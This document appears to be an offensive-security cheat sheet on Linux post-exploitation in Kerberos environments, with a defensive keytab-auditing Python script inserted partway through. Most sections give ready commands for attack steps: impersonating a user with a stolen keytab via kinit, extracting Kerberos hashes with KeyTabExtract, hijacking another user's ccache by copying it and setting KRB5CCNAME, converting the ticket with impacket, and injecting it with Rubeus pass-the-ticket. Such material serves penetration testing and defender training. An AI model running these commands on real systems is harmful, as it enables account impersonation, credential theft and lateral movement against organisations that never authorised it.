# Linux Post-Exploitation

## Abusing Keytab

### Impersonate user

```bash
klist -k -t # list the keys in the default keytab, with timestamps
kinit carni7@AMOGUS.KEK -k -t /opt/kerbusers/carni7.keytab # obtain a ticket as carni7 using his keytab
```

### KeyTabExtract

[**\[LINK\]**](https://github.com/sosdave/KeyTabExtract) This tool extracts **Kerberos** hashes from a **keytab** file.

```bash
python3 /opt/keytabextract.py /opt/specialfiles/carni7.keytab
```
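From the defender's side, the same file format can be audited for the two conditions that make a keytab like the one above valuable: loose file permissions and deprecated encryption types. The following is an added example, not code from this page or from KeyTabExtract; it assumes the MIT keytab layout version 0x0502, the function names are hypothetical, and the sample entries are constructed with an all-zero dummy key.

```python
import os, stat, struct

WEAK_ENCTYPES = {1: "des-cbc-crc", 3: "des-cbc-md5", 23: "rc4-hmac"}  # deprecated, flag these

def counted(data, p):  # 16-bit length-prefixed string -> (text, next offset)
    (n,) = struct.unpack_from(">H", data, p)
    return data[p + 2:p + 2 + n].decode(), p + 2 + n

def parse_keytab(data):
    """Return [(principal, kvno, enctype)] from a 0x0502 keytab. Key bytes are skipped."""
    if data[:2] != b"\x05\x02":
        raise ValueError("not a version 0x0502 keytab")
    entries, pos = [], 2
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)
        pos += 4
        if size <= 0:                      # negative size marks a deleted entry (hole)
            pos -= size
            continue
        (ncomp,) = struct.unpack_from(">H", data, pos)
        realm, p = counted(data, pos + 2)
        parts = []
        for _ in range(ncomp):
            text, p = counted(data, p)
            parts.append(text)
        kvno = data[p + 8]                 # after name type (4) and timestamp (4)
        enctype, keylen = struct.unpack_from(">HH", data, p + 9)
        p += 13 + keylen                   # step over the key material unread
        if pos + size - p >= 4:            # optional 32-bit kvno replaces the 8-bit one
            kvno = struct.unpack_from(">I", data, p)[0] or kvno
        entries.append(("/".join(parts) + "@" + realm, kvno, enctype))
        pos += size
    return entries

def audit_keytab(path):
    """Return findings for one keytab file: loose mode bits and deprecated enctypes."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    findings = [f"mode {mode:04o}: group/other access bits set"] if mode & 0o077 else []
    with open(path, "rb") as fh:
        for princ, kvno, etype in parse_keytab(fh.read()):
            if etype in WEAK_ENCTYPES:
                findings.append(f"{princ} kvno {kvno}: {WEAK_ENCTYPES[etype]}")
    return findings

def sample_entry(enctype):  # constructed entry for carni7@AMOGUS.KEK, dummy zero key
    body = (struct.pack(">HH", 1, 10) + b"AMOGUS.KEK" + struct.pack(">H", 6) + b"carni7"
            + struct.pack(">IIBHH", 1, 0, 2, enctype, 16) + bytes(16) + struct.pack(">I", 2))
    return struct.pack(">i", len(body)) + body
SAMPLE = b"\x05\x02" + sample_entry(23) + sample_entry(18)  # constructed: rc4-hmac, aes256
```

`audit_keytab` returns an empty list only when the file is accessible to its owner alone and holds no DES or RC4 keys.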

## Abusing ccache

To use **ccache** files you need root privileges.

### Checking group privileges

```bash
id venator177@amogus.kek
```

After locating the right non-expired **Kerberos** ticket, we can import the **ccache** file into our session by changing the value of the **`KRB5CCNAME`** environment variable and then checking the tickets with **klist**.

```bash
cp /tmp/krb5cc_768304578_BRB541 . # assumes the current directory is /root
export KRB5CCNAME=/root/krb5cc_768304578_BRB541
klist
# output:
Ticket cache: FILE:/root/krb5cc_768304578_BRB541
```

If the result is the same, we can be sure that **Kerberos** is now using our ticket.

## Ticket Converter

```bash
impacket-ticketConverter krb5cc_768304578_BRB541 carni7.kirbi
```

### Importing Kerberos Ticket

```powershell
C:\Rubeus.exe ptt /ticket:c:\carni7.kirbi
```
